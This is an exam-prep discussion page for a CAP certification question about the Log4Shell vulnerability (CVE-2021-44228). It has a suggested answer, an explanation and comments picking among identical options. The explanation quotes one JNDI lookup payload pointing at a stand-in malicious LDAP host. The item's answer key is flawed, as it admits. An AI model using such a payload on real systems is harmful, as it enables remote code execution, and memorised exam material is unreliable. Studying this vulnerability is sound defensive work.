Deal of The Day! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions

The SecOps Group Exam CAP Topic 12 Question 95 Discussion

Actual exam question for The SecOps Group's CAP exam
Question #: 95
Topic #: 12
[All CAP Questions]

In the context of the infamous log4j vulnerability (CVE-2021-44228), which vulnerability is exploited in the backend to achieve Remote Code Execution?

Show Suggested Answer Hide Answer
Suggested Answer: B

The Log4j vulnerability, identified as CVE-2021-44228 (commonly known as Log4Shell), is a critical security flaw in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability allows remote code execution (RCE) when an attacker crafts a malicious input (e.g., ${jndi:ldap://malicious.com/a}) that is logged by a vulnerable Log4j instance. The exploit leverages JNDI (Java Naming and Directory Interface) Injection, where the JNDI lookup mechanism is abused to load remote code from an attacker-controlled server. All options (A, B, and C) list 'JNDI Injection,' which is correct, but since B is marked as the selected answer in the image, it is taken as the intended choice. This redundancy in options suggests a possible error in the question design, but the vulnerability is unequivocally JNDI Injection. Option D ('None of the above') is incorrect as JNDI Injection is the exploited vulnerability. This topic is critical in the CAP syllabus under injection attacks and RCE prevention.


Contribute your Thoughts:

Sanda
7 days ago
I'm not sure, but I think it's A) JNDI Injection as well. It makes sense given the nature of the log4j vulnerability.
upvoted 0 times
...
Bettyann
8 days ago
B) JNDI Injection - I learned about this in my security training. Definitely the correct answer.
upvoted 0 times
Amie
3 days ago
A) JNDI Injection - That's correct! It's the vulnerability exploited in the backend for Remote Code Execution.
upvoted 0 times
...
...
Marva
9 days ago
I agree with Louvenia, JNDI Injection is the vulnerability exploited for Remote Code Execution.
upvoted 0 times
...
Merissa
15 days ago
JNDI Injection for sure! That's the key vulnerability that allows the log4j exploit to work.
upvoted 0 times
Fausto
19 hours ago
Yes, JNDI Injection is the key vulnerability that allows the log4j exploit to work.
upvoted 0 times
...
Ming
6 days ago
JNDI Injection is definitely the vulnerability exploited for Remote Code Execution.
upvoted 0 times
...
...
Louvenia
29 days ago
I think the answer is A) JNDI Injection.
upvoted 0 times
...

Save Cancel